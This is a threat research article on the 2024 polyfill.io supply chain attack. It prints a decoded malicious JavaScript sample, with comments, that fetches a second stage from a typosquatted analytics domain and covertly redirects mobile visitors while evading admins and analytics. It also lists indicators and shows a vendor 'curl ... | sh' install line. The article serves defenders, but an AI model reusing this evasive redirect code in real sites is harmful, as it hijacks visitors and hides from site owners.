https://sansec.io/research/polyfill-supply-chain-attack Polyfill supply chain attack hits 100K+ sites — by Sansec Forensics Team, published in Threat Research, June 25, 2024. The new Chinese owner of the popular Polyfill JS project injects malware into more than 100 thousand sites. Update June 25th: Google has already started blocking Google Ads for eCommerce sites that use polyfill.io. The polyfill.js is a popular open source library to support older browsers. 100K+ sites embed it using the cdn.polyfill.io domain. Notable users are JSTOR, Intuit and World Economic Forum. However, in February this year, a Chinese company bought the domain and the GitHub account. Since then, this domain was caught injecting malware on mobile devices via any site that embeds cdn.polyfill.io. Any complaints were quickly removed (archive here) from the GitHub repository. The polyfill code is dynamically generated based on the HTTP headers, so multiple attack vectors are likely. Sansec decoded one particular malware sample (see below) which redirects mobile users to a sports betting site using a fake Google Analytics domain (www.googie-anaiytics.com). The code has specific protection against reverse engineering, and only activates on specific mobile devices at specific hours. It also does not activate when it detects an admin user, and it delays execution when a web analytics service is found, presumably so that the redirect does not show up in the site's statistics. The original polyfill author recommends not using Polyfill at all, as it is no longer needed by modern browsers anyway. Meanwhile, both Fastly and Cloudflare have put up trustworthy alternatives if you still need it.
This incident is a typical example of a supply chain attack. To get visibility into the code that your users are loading, we recommend our (free) CSP monitoring service Sansec Watch. Our eComscan backend scanner has also been updated with polyfill.io detection. Polyfill malicious payload example We added some names for readability, however tiaozhuan came from the original malware (which means "jump" in Chinese).
// Analysis notes on the decoded sample (names added for readability by Sansec).
// The three functions plus the trailing top-level statements form a conditional
// redirect payload. Comments describe what the visible code does and where a
// defender can observe it; `loadJS` and `usercache` are referenced but not defined
// in this excerpt — presumably provided by the remote second-stage script, verify
// against the full sample.

// Desktop gate: returns true only when navigator.platform reports Windows or one of
// the listed Mac platform strings; anything else (including an exception while
// reading navigator) yields false. The caller uses the negation, so the redirect is
// reserved for visitors that are NOT identified as a Windows/Mac desktop.
function isPc() {
  try {
    var _isWin = navigator.platform == "Win32" || navigator.platform == "Windows",
      _isMac =
        navigator.platform == "Mac68K" ||
        navigator.platform == "MacPPC" ||
        navigator.platform == "Macintosh" ||
        navigator.platform == "MacIntel";
    if (_isMac || _isWin) {
      return true;
    } else {
      return false;
    }
  } catch (_0x44e1f6) {
    return false;
  }
}

// Second stage + redirect. If the target URL is non-empty, pulls a script from the
// typosquatted host "www.googie-anaiytics.com" (i-for-l substitutions imitating
// google-analytics.com) and, in its load callback, navigates the top window to the
// target URL when the global `usercache` is true. Detection: any request to this
// host from a page is an indicator of compromise on its own (see the IoC list
// below); a CSP / SRI policy that pins allowed script origins blocks this call.
function vfed_update(_0x5ae1f8) {
  _0x5ae1f8 !== "" &&
    loadJS(
      "https://www.googie-anaiytics.com/html/checkcachehw.js",
      function () {
        if (usercache == true) {
          window.location.href = _0x5ae1f8;
        }
      }
    );
}

// Decision logic ("tiaozhuan" = jump). Only proceeds when the user agent matches the
// mobile regex below. The redirect target is then chosen by, in order:
//   1. current host contains one of two hard-coded hostnames   -> always redirect
//   2. current host contains "shuanshu.com.com"                -> always redirect
//   3. referrer contains a "." and does not contain the current
//      host (i.e. the visitor arrived from an external site)  -> always redirect
//   4. otherwise a time-of-day lottery on a 1..100 random draw:
//        00:00-01:59 -> redirect if draw <= 10
//        02:00-03:59 -> redirect if draw <= 15
//        04:00-06:59 -> redirect if draw <= 20
//        07:00-07:59 -> redirect if draw <= 10 (the ternary's two arms are
//                       identical, so this case is indistinguishable from the
//                       remaining hours, which also use <= 10)
// `_hours` comes from Date.getHours(), i.e. the victim browser's local time.
// Finally the redirect only fires when isPc() is false and document.cookie does
// not contain the substrings "admin_id" or "adminlevels" — an attempt to keep the
// behaviour away from logged-in administrators. For defenders this means a desktop
// browser, an admin session, or a single on-site page view will usually not
// reproduce the redirect; reproduction needs a mobile UA, a non-admin session and,
// outside the referrer path, several attempts.
function check_tiaozhuan() {
  var _isMobile = navigator.userAgent.match(
    /(phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i
  );
  if (_isMobile) {
    var _curHost = window.location.host,
      _ref = document.referrer,
      _redirectURL = "",
      _kuurzaBitGet = "https://kuurza.com/redirect?from=bitget",
      _rnd = Math.floor(Math.random() * 100 + 1),
      _date = new Date(),
      _hours = _date.getHours();
    // Hard-coded hosts: purpose unknown from this excerpt (possibly the operator's
    // own test sites — unconfirmed).
    if (
      _curHost.indexOf("www.dxtv1.com") !== -1 ||
      _curHost.indexOf("www.ys752.com") !== -1
    ) {
      _redirectURL = "https://kuurza.com/redirect?from=bitget";
    } else {
      if (_curHost.indexOf("shuanshu.com.com") !== -1) {
        _redirectURL = "https://kuurza.com/redirect?from=bitget";
      } else {
        // External referrer -> unconditional redirect.
        if (_ref.indexOf(".") !== -1 && _ref.indexOf(_curHost) == -1) {
          _redirectURL = "https://kuurza.com/redirect?from=bitget";
        } else {
          // Time-of-day lottery (see table above).
          if (_hours >= 0 && _hours < 2) {
            if (_rnd <= 10) {
              _redirectURL = _kuurzaBitGet;
            }
          } else {
            if (_hours >= 2 && _hours < 4) {
              _rnd <= 15 && (_redirectURL = _kuurzaBitGet);
            } else {
              if (_hours >= 4 && _hours < 7) {
                _rnd <= 20 && (_redirectURL = _kuurzaBitGet);
              } else {
                // Both arms are the same threshold; the 7-8h distinction has no effect.
                _hours >= 7 && _hours < 8
                  ? _rnd <= 10 && (_redirectURL = _kuurzaBitGet)
                  : _rnd <= 10 && (_redirectURL = _kuurzaBitGet);
              }
            }
          }
        }
      }
    }
    // Final gates: non-desktop platform and no admin-looking cookie names.
    _redirectURL != "" &&
      !isPc() &&
      document.cookie.indexOf("admin_id") == -1 &&
      document.cookie.indexOf("adminlevels") == -1 &&
      vfed_update(_redirectURL);
  }
}

// Entry point. Scans the serialized DOM for the hostnames of eight web analytics
// services; if any is present, the check is deferred by 2 seconds (setTimeout), else
// it runs immediately. The article infers this is meant to keep the redirect out of
// the site's analytics. Note that the whole decision runs client-side, so a server
// log alone will not show it; CSP violation reports or a client-side script monitor
// (as the article recommends) are the practical detection points.
let _outerPage = document.documentElement.outerHTML,
  bdtjfg = _outerPage.indexOf("hm.baidu.com") != -1;
let cnzfg = _outerPage.indexOf(".cnzz.com") != -1,
  wolafg = _outerPage.indexOf(".51.la") != -1;
let mattoo = _outerPage.indexOf(".matomo.org") != -1,
  aanaly = _outerPage.indexOf(".google-analytics.com") != -1;
let ggmana = _outerPage.indexOf(".googletagmanager.com") != -1,
  aplausix = _outerPage.indexOf(".plausible.io") != -1,
  statcct = _outerPage.indexOf(".statcounter.com") != -1;
bdtjfg || cnzfg || wolafg || mattoo || aanaly || ggmana || aplausix || statcct
  ? setTimeout(check_tiaozhuan, 2000)
  : check_tiaozhuan();
Indicators of compromise https://kuurza.com/redirect?from=bitget https://www.googie-anaiytics.com/html/checkcachehw.js https://www.googie-anaiytics.com/ga.js Read more * CosmicSting attack threatens 75% of Adobe Commerce stores * Persistent Magento backdoor hidden in XML * Sansec joins forces with Google's VirusTotal * Sansec and Europol counter online skimming * Magento wish list exploit bypasses WAF protection In this article 1. Polyfill malicious payload example 2. Indicators of compromise [malware] Easy CSP for your store? Try Sansec Watch! Free, simple and fully integrated. Get PCI compliant alerting with minimal effort. Sansec Watch Scan your store now for malware & vulnerabilities $ curl ecomscan.com | sh copy code eComscan is the most thorough security scanner for Magento, Adobe Commerce, Shopware, WooCommerce and many more.